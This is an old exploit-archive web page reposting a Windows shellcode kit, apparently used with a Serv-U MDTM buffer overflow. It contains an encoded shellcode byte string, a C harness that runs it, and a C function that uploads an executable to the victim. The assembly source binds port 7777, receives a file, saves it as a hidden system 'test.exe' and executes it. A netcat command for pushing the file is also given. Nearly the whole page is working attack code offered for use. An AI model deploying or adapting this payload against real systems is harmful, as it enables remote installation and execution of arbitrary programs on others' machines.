首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Uploading shellcode v0.2 with mtdm serv-u overflow
来源:www.delikon.de 作者:vfocus 发布时间:2004-05-14  

/*
Uploading and executing shellcode v0.2 | www.delikon.de | 2.5.04
i have test this exploit, with the mtdm serv-u overflow.

thanks to
-Jarkko Turkulainen (http://www.klake.org/~jt/asmcode/)
for his shellcode encoder
-ratter for the PEB structure information.
-www.metasploit.com where i have copy and paste
90% percent of this code

for uploading a file use the function below, or netcat

nc ip 7777 < file.exe
Strg-C
*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
char shellcode[] = "\xD9"//xor 0x88 | port 7777
"\xE1\xD9\x34\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x4E\xFE\x80\x30"
"\x88\x40\xE2\xFA\x61\xEC\x89\x88\x88\xD3\xDD\x01\x6D\xEE\x09\x64\xBC\x88\x01\x6E"
"\xEE\x09\x64\x84\x88\x60\x53\x88\x88\x88\x01\x4F\xDF\xE0\x06\xC6\x86\x64\x60\x6F"
"\x88\x88\x88\x01\xCD\x80\x05\xDB\xB8\xDA\x77\xDD\x80\x01\xCD\x80\x05\xDB\xB3\x01"
"\xDE\xBC\xE2\x85\xD1\xEE\x09\x71\x8F\x88\xFD\x8B\x03\xF5\x80\x01\x86\xDF\x77\xFC"
"\x03\x74\x60\x33\x88\x88\x88\x03\x86\x01\xCC\x06\x74\x6A\x6A\xEE\x09\x64\x18\x89"
"\xDC\xE0\x89\x89\x88\x88\x77\xDE\x8C\xB9\x77\xDF\xDF\xDF\xDF\xCF\xDF\xCF\xDF\x77"
"\x9E\x01\x4B\xB9\x77\xDF\xDF\xE0\x8A\x88\x96\xE9\x01\x6A\xE2\x98\xDA\xDB\x77\xDE"
"\x80\xDF\xDB\x77\xDE\x84\xDF\xDE\xDB\x77\xDE\x98\x01\x4B\xE2\x88\xE2\x8E\xE2\x8C"
"\xE2\x88\xE2\x8F\xE0\x88\x88\x88\x68\x77\xFE\xBC\x77\xDE\xAC\x01\x4F\x09\x64\x14"
"\x77\x77\x77\x01\x6D\x05\xDD\xEC\xE2\x88\xE0\xEC\x88\x88\x88\xDA\xDB\x77\xDE\x9C"
"\xB5\x77\x77\x77\x77\xFC\x9D\xB5\x88\x88\x88\x88\xFC\x86\x05\xDD\xEC\xE2\x88\xD9"
"\xD8\xDA\xDF\x77\xDE\xA0\x63\x5D\xDF\x77\xDE\xA4\xE0\x8D\x88\x88\x88\x77\xFE\xBC"
"\x77\xDE\xA8\xB9\x77\xDF\x77\xDE\x94\xDD\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84"
"\x03\xF8\x94\x25\x03\xE0\x80\x01\x60\xD6\xD5\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4"
"\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B"
"\xBD\xC1\x03\xBC\x03\x89\x66\xB9\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85"
"\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03"
"\xD2\x94\x89\x63\x03\x8C\x03\x89\x60\x61\x8A\x88\x88\x88\xB9\x48\x01\x62\xD7\xD6"
"\xD5\xD3\x4A\x8C\x88\x60\x1F\x76\x77\x77\x51\x81\x7D\x25\x43\x65\x74\xB3\x2C\x92"
"\xF8\x4F\x2C\x25\xA6\x61\x6D\xC1\x0E\xC1\x3E\x91\x90\x6F\x6F\xF1\x4E\xF1\xF6\x50"
"\x6A\xFB\x10\x76\x02\x86\x2D\x9F\x88\xF4\x97\xF1\x82\x60\x73\x1F\x75\x87\xDF\xDB"
"\xBA\xD7\xBB\xBA\xA6\xCC\xC4\xC4\x88\xFC\xED\xFB\xFC\xA6\xED\xF0\xED\x88";

int
main(){
WSADATA wsa;
void (*funct) ();
(long) funct = &shellcode;
WSAStartup(MAKEWORD(2,0),&wsa);
funct();}

/*

//you can use this function for the file upload


int fileupload(int port,char *FileName,char* ip){

FILE* file;


int sockfd, numbytes;

struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL;
int read=0;


printf("[+] Opening File\n");

file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failed\n");
return -1;
}
printf("[+] File found ready to send\n");

if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting error\n");
return -1;
}
printf("[+] Connected\n[+] Sending executable.\n");

while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return -1;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 0;
}


*/


/*
[BITS 32]

%define BLOCKSZ 100

jmp data


start:
pop ebx
push ebp
mov ebp,esp
sub sp,52 ;we want save 4*13 bytes for func addr
mov esi,esp
sub sp,12

call LK32Base
mov edi, eax ; kernel addr in EDI


push dword edi
push 0xec0e4e8e
call LGetProcAddress
mov [ebp+8], eax ; LoadLibrary addr in ebp+8


lea edx,[ebx+48]
push edx
call [ebp+8]
mov [ebp+8],eax

lea edx,[ebx+59] ;get the file name
mov [esi+52],edx


push byte 0xd
pop ecx
kerneladdr:
cmp cx,11-4
jne here
mov edi,[ebp+8]


here:
mov [esi],ecx ;save the counter
push dword edi
push dword [ecx*4+ebx-4]
call LGetProcAddress
mov ecx,[esi] ;restore it
mov [esi+ecx*4-4],eax
loop kerneladdr

LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [esi + 4]

LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
xor edi,edi
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [esi]
mov ebx, eax ; save socket to ebx


LBind:
xor edi, edi
push edi
push edi
push dword 0x611E0002 ; port 7777
mov edx, esp
push byte 0x10 ; length
push edx
push ebx
call [esi + 8]

LListen:
push edi
push ebx
call [esi+12]

LAccept:
push edi
push esi
push ebx
call [esi + 16]
mov ebx, eax

LCreateFile:

push byte 0 ; template
push byte 6 ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
push byte 4 ; OPEN_ALWAYS
push byte 0 ; lpSecurityAttributes=null
push byte 7 ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE;
push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE
push dword [esi+52] ; file name
call [esi+36]
mov edi, eax ; Handle in edi

LConfigBuffer:

sub esp, BLOCKSZ - 200
mov ebp,esp

LReadSocket: ; recv(s, buff, 4096, 0)
lea edx, [ebp+100] ; recv buffer ptr
push byte 0x00 ; flags
push BLOCKSZ ; length
push edx ; buffer
push dword ebx ; socket
call [esi+20] ; recv()

cmp eax,0xFFFFFFFF ; disconnect ?? yes! go end
je end
cmp eax,0 ; disconnect ?? yes! go end
je end

LWriteFile:
lea edx, [ebp+100] ; recv buffer ptr
push byte 0 ; not overlapped
push ecx ; &written
push eax ; recv len
push edx ; source buffer
push edi ; file handle
call [esi+40] ; WriteFile


jmp LReadSocket ; go read some more

end:
LCloseHandle:
push edi
call [esi+44]

push 5
push dword [esi+52]
call [esi+32]

xor edi,edi
push edi
call [esi+28]

LK32Base:
push ebp
push esi

mov eax, [fs:0x30]

mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebp, [eax + 0x08]

mov eax, ebp
pop esi
pop ebp
ret 4

LGetProcAddress:

push ebx
push ebp
push esi
push edi

mov ebp, [esp + 24]; DLL Base Address
mov eax, [ebp + 0x3c]; eax = PE header offset
mov edx, [ebp + eax + 120]
add edx, ebp; edx = exports directory table
mov ecx, [edx + 24]; ecx = number of name pointers
mov ebx, [edx + 32]
add ebx, ebp; ebx = name pointers table

LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp; esi = name pointer
xor edi, edi
cld

LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp LHshlp

LFnd:
; compare computed hash to argument
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]; ebx = ordinals table RNA
add ebx, ebp
mov cx, [ebx + 2 * ecx]; ecx = function ordinal
mov ebx, [edx + 28]; ebx = address table RVA
add ebx, ebp
mov eax, [ebx + 4 * ecx]; eax = address of function RVA
add eax, ebp
jmp LDone

LNtfnd:
xor eax, eax

LDone:
mov edx, ebp

pop edi
pop esi
pop ebp
pop ebx
ret 4


data:

call start
;addr of kernel
dd 0xadf509d9 ;WSASocketA [esi]
dd 0x3bfcedcb ;WSAStartup 4
dd 0xc7701aa4 ;bind 8
dd 0xe92eada4 ;listen 12
dd 0x498649e5 ;accept 16
dd 0xe71819b6 ;recv 20
dd 0x79c679e7 ;closesocket 24


dd 0x73e2d87e ;ExitProcess 28
dd 0x0e8afe98 ;WinExec 32

dd 0x7c0017a5 ;CreateFileA 36
dd 0xe80a791f ;WriteFile 40
dd 0x0ffd97fb ;CloseHandle 44

db "WS2_32.DLL", 0x00
db "test.exe", 0x00


*/



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Local AIX getlvcb Exploit
·Symantec Multiple Firewall DNS
·PaX DoS proof-of-concept
·Envymask 写的DVBBS UPFILES EXP
·Sasser Worm ftpd Remote Buffer
·BBSXP setup.asp top function i
·Monit 4.1 Remote Buffer Overru
·动网上传漏洞利用工具Gui版(De
·Pound <=1.5 remote format s
·IIS后门设置脚本 FOR WIN2000
·Eudora file URL buffer overflo
·Linux FreeBSD CVS exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved